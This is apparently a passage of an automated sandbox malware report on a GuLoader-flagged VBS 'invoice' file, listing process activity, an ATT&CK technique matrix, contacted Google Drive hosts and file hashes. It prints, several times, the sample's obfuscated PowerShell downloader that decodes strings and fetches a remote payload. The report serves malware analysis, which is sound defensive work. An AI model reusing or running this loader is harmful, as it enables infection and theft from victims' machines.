Source: wscript.exe, 00000000.00000002.1375520650.0000013D6CFD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000003.1371981845.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363955829.0000013D6D29D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1365525218.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373978374.0000013D6D2C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1364056176.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375690007.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375982993.0000013D6D2C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363491376.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373454782.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1371739261.0000013D6D2C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363852731.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErklJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$epidydimus = 1;$painters21='substrin';$painters21+='g';function antimeningococcic($gejstligt){$nosher=$gejstligt.length-$epidydimus;for($antisnapper=5; $antisnapper -lt $nosher; $antisnapper+=(6)){$taxmen+=$gejstligt.$painters21.invoke($antisnapper, $epidydimus);}$taxmen;}function cairned($fremvisningen){. ($chantors) ($fremvisningen);}$veteraness=antimeningococcic 'manitmneph,onringzregili.hiotlaspirlmet.raklis,/ un.e5svam,. afvi0bryde hjlp(thundwfemmlikoo.dnservidalkohovetuswglaiestaare ttslunddfdstovern erhve1ambas0 vatp.therm0quito;caul nonl wlinieire,ubncarah6feabe4finia;malac .apeixl,lla6re,ro4ungar;pre.n notergastrvagmas:bazzi1tr.me2 neph1spe,l.n ter0sev.r)velve reprig celievasalcchon.kpampaorecta/okkup2prs,r0radom1entoc0vov,d0nonst1hemag0,aama1 ksam familfudadriridgir notcech.llfcenoso .rorxcoons/ warn1f.mte2skede1udgif.ties.0solip ';$maskinafdelinger=antimeningococcic 'indviu,ablesdominebrou,r blok-tabifanuculgseksee ,ccenhandbtoutbu ';$trngendes=antimeningococcic ' alpehdurditafbryttagliphabilskal,i:super/dee,d/feticd showr cymoilokalvreheae lant. tvrfg tjsvo flado resogse,iclsaf,aespiro.lnpolc gillonive muntan/c vilupate cwa,tr?smelteconquxsp itpsta,doservir o.ert ramp=boldhdgeon.ogriotw indkntromllaffreo diskaudmand.orti&phyllide.rwdtaint=nonp,1 pinn0inddanaktivj larmvkoombwcatalcbn.elqag.ip2 undeq kos knonrem.anscz eddyzminiakarticlafkogk poveaardeam wisex,alinzvenge6epit tpenge1recla5,entrjvek,ltlevnep nder2 glycrvinhakraakrbsamfuhpont. ';$skulapstavs=antimeningococcic 'delig>crash ';$chantors=antimeningococcic 'flymeimasonehash.xshei ';$anniversariness = antimeningococcic 'no.mae sta,cbassoh.gpaaoudv.k symp% wi,das,mfupmisr,pmedendha niasystetoverfamotst% .ryd\badescant.cabe alb .esaa,repsshuskesmalguoforesuevolu.fungitstatsupoundnopst palae&disku&chain cretaeradiocsarcohbegrao arar anato$divis ';cairned (antimeningococcic 'unim $afvu,ghenk,love eogallib preaaexinglhilbe:llebrt,entrofort s pahacoversaramifn ana aomski=tor i(antalcac.mpmideendtalel nylon/rif,ec vamb korru$ agara sychnwinten phoniho otvdeltaerudelravilasg lioa,kalmrbastkiaa,eknsol.refortrsblocks .agr)subpr ');cairned (antimeningococcic ' oshy$moblegs.kofl fac,o vocabtrst akonomlpipin:,elchltidssycellano,iefn for ebrnd dsynodssaddela.iata,orbrgrevesepreasngaranedesi.s anjo1sku k6black=affal$ kommtsae nre,astnnedrigailuregodsen.rypad terreldigesunref.bjergsek,popjorddla retistrantmanag(cuber$b gaescarlyk counu r,tulslacka triapfucusslancetlampeaneutrvsa mestral.)septa ');$trngendes=$lynnedslagenes16[0];cairned (antimeningococcic '.ubgo$episkgin.asl ,tamosuprab infoa.esoelthe,r:fniscm.echaeopkrvtaeratakretslh,elclgaussisub efregalaric.icsh oott.geru.irkerbeco e anar= afg nforgre dryrwauric-anlg oam hibtangajfs,ebe amulchvalptgroun friedst nefyforfasengratblodmethrummortho. aludnpropoedomsttpa ad.agouawjobb efletsbsamlic appllchis.i erkl
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$epidydimus = 1;$painters21='substrin';$painters21+='g';function antimeningococcic($gejstligt){$nosher=$gejstligt.length-$epidydimus;for($antisnapper=5; $antisnapper -lt $nosher; $antisnapper+=(6)){$taxmen+=$gejstligt.$painters21.invoke($antisnapper, $epidydimus);}$taxmen;}function cairned($fremvisningen){. ($chantors) ($fremvisningen);}$veteraness=antimeningococcic 'manitmneph,onringzregili.hiotlaspirlmet.raklis,/ un.e5svam,. afvi0bryde hjlp(thundwfemmlikoo.dnservidalkohovetuswglaiestaare ttslunddfdstovern erhve1ambas0 vatp.therm0quito;caul nonl wlinieire,ubncarah6feabe4finia;malac .apeixl,lla6re,ro4ungar;pre.n notergastrvagmas:bazzi1tr.me2 neph1spe,l.n ter0sev.r)velve reprig celievasalcchon.kpampaorecta/okkup2prs,r0radom1entoc0vov,d0nonst1hemag0,aama1 ksam familfudadriridgir notcech.llfcenoso .rorxcoons/ warn1f.mte2skede1udgif.ties.0solip ';$maskinafdelinger=antimeningococcic 'indviu,ablesdominebrou,r blok-tabifanuculgseksee ,ccenhandbtoutbu ';$trngendes=antimeningococcic ' alpehdurditafbryttagliphabilskal,i:super/dee,d/feticd showr cymoilokalvreheae lant. tvrfg tjsvo flado resogse,iclsaf,aespiro.lnpolc gillonive muntan/c vilupate cwa,tr?smelteconquxsp itpsta,doservir o.ert ramp=boldhdgeon.ogriotw indkntromllaffreo diskaudmand.orti&phyllide.rwdtaint=nonp,1 pinn0inddanaktivj larmvkoombwcatalcbn.elqag.ip2 undeq kos knonrem.anscz eddyzminiakarticlafkogk poveaardeam wisex,alinzvenge6epit tpenge1recla5,entrjvek,ltlevnep nder2 glycrvinhakraakrbsamfuhpont. ';$skulapstavs=antimeningococcic 'delig>crash ';$chantors=antimeningococcic 'flymeimasonehash.xshei ';$anniversariness = antimeningococcic 'no.mae sta,cbassoh.gpaaoudv.k symp% wi,das,mfupmisr,pmedendha niasystetoverfamotst% .ryd\badescant.cabe alb .esaa,repsshuskesmalguoforesuevolu.fungitstatsupoundnopst palae&disku&chain cretaeradiocsarcohbegrao arar anato$divis ';cairned (antimeningococcic 'unim $afvu,ghenk,love eogallib preaaexinglhilbe:llebrt,entrofort s pahacoversaramifn ana aomski=tor i(antalcac.mpmideendtalel nylon/rif,ec vamb korru$ agara sychnwinten phoniho otvdeltaerudelravilasg lioa,kalmrbastkiaa,eknsol.refortrsblocks .agr)subpr ');cairned (antimeningococcic ' oshy$moblegs.kofl fac,o vocabtrst akonomlpipin:,elchltidssycellano,iefn for ebrnd dsynodssaddela.iata,orbrgrevesepreasngaranedesi.s anjo1sku k6black=affal$ kommtsae nre,astnnedrigailuregodsen.rypad terreldigesunref.bjergsek,popjorddla retistrantmanag(cuber$b gaescarlyk counu r,tulslacka triapfucusslancetlampeaneutrvsa mestral.)septa ');$trngendes=$lynnedslagenes16[0];cairned (antimeningococcic '.ubgo$episkgin.asl ,tamosuprab infoa.esoelthe,r:fniscm.echaeopkrvtaeratakretslh,elclgaussisub efregalaric.icsh oott.geru.irkerbeco e anar= afg nforgre dryrwauric-anlg oam hibtangajfs,ebe amulchvalptgroun friedst nefyforfasengratblodmethrummortho. aludnpropoedomsttpa ad.agouawjobb efletsbsamlic appllchis.i erklJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting
Valid Accounts11
Command and Scripting Interpreter
221
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell
Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
FACTURA 130424435.vbs24%ReversingLabsScript-WScript.Trojan.Guloader
FACTURA 130424435.vbs12%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalseunknown
drive.google.com
142.250.105.102
truefalse
    high
    drive.usercontent.google.com
    173.194.219.132
    truefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      https://www.google.compowershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580488000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://drive.usercontent.google.compowershell.exe, 00000002.00000002.1485282092.000001C581DEE000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: malware
            • URL Reputation: malware
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://go.micropowershell.exe, 00000002.00000002.1485282092.000001C5812CB000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://contoso.com/Licensepowershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://drive.googPpowershell.exe, 00000002.00000002.1485282092.000001C581DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  https://drive.google.compowershell.exe, 00000002.00000002.1485282092.000001C5818BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://drive.usercontent.googhpowershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      https://drive.usercontent.google.compowershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C58048C000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://drive.google.compowershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://apis.google.compowershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.105.102
                                  drive.google.comUnited States
                                  15169GOOGLEUSfalse
                                  173.194.219.132
                                  drive.usercontent.google.comUnited States
                                  15169GOOGLEUSfalse
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1427933
                                  Start date and time:2024-04-18 11:05:02 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 21s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:11
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:FACTURA 130424435.vbs
                                  Detection:MAL
                                  Classification:mal100.expl.evad.winVBS@6/6@2/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 5
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 199.232.210.172
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 1644 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  TimeTypeDescription
                                  11:05:53API Interceptor1x Sleep call for process: wscript.exe modified
                                  11:05:55API Interceptor47x Sleep call for process: powershell.exe modified
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  bg.microsoft.map.fastly.netjustificant de transfer#U00e8ncia.vbsGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  Justificante de pago.vbsGet hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                  • 199.232.214.172
                                  http://185.91.69.110Get hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  http://ranchpools.comGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  https://windowdefalerts-error0x21903-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                  • 199.232.210.172
                                  https://windowdefalerts-error0x21908-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                  • 199.232.210.172
                                  https://windowdefalerts-error0x21902-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                  • 199.232.214.172
                                  https://www.applelswlqod.top/all/login.php?idsmt=10123005600&nextfunck=10130550000Get hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  https://17.104-168-101-28.cprapid.com/PayPal/Get hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0ejustificant de transfer#U00e8ncia.vbsGet hashmaliciousUnknownBrowse
                                  • 142.250.105.102
                                  • 173.194.219.132
                                  Justificante de pago.vbsGet hashmaliciousUnknownBrowse
                                  • 142.250.105.102
                                  • 173.194.219.132
                                  Purchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                  • 142.250.105.102
                                  • 173.194.219.132
                                  Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                  • 142.250.105.102
                                  • 173.194.219.132
                                  p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                  • 142.250.105.102
                                  • 173.194.219.132
                                  SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.105.102
                                  • 173.194.219.132
                                  SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exeGet hashmaliciousAgentTeslaBrowse
                                  • 142.250.105.102
                                  • 173.194.219.132
                                  SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                  • 142.250.105.102
                                  • 173.194.219.132
                                  SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.105.102
                                  • 173.194.219.132
                                  Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                  • 142.250.105.102
                                  • 173.194.219.132
                                  No context
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                  Category:dropped
                                  Size (bytes):69993
                                  Entropy (8bit):7.99584879649948
                                  Encrypted:true
                                  SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                  MD5:29F65BA8E88C063813CC50A4EA544E93
                                  SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                  SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                  SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
